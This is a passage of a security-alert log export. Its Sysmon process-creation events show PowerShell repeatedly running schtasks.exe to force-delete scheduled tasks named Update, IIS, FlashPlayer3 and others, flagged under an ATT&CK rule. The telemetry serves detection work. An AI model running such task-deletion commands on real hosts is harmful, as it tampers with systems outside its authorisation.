Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.285",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.161 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00103e3e3100} +ProcessId: 7012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.206566900Z"",""eventRecordID"":""3954"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.161\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00103e3e3100}\r\nProcessId: 7012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:40.161"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00103e3e3100}"",""processId"":""7012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.264",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.065 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00102d3c3100} +ProcessId: 6248 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.070629700Z"",""eventRecordID"":""3953"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.065\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00102d3c3100}\r\nProcessId: 6248\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.065"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00102d3c3100}"",""processId"":""6248"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.247",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.970 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-0010423a3100} +ProcessId: 1348 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.981167300Z"",""eventRecordID"":""3952"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.970\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-0010423a3100}\r\nProcessId: 1348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 
0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.970"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-0010423a3100}"",""processId"":""1348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.232",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.896 +ProcessGuid: 
{df9fc3d3-b417-5ecf-0000-001007383100} +ProcessId: 5944 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.902112300Z"",""eventRecordID"":""3951"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.896\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001007383100}\r\nProcessId: 5944\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.896"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001007383100}"",""processId"":""5944"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.216",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.847 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001028363100} +ProcessId: 6784 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.854220300Z"",""eventRecordID"":""3950"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.847\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001028363100}\r\nProcessId: 6784\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:39.847"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001028363100}"",""processId"":""6784"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.169",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:39.792 +ProcessGuid: {df9fc3d3-b417-5ecf-0000-001058343100} +ProcessId: 168 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:39.797940300Z"",""eventRecordID"":""3949"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:39.792\r\nProcessGuid: {df9fc3d3-b417-5ecf-0000-001058343100}\r\nProcessId: 168\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:39.792"",""processGuid"":""{df9fc3d3-b417-5ecf-0000-001058343100}"",""processId"":""168"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 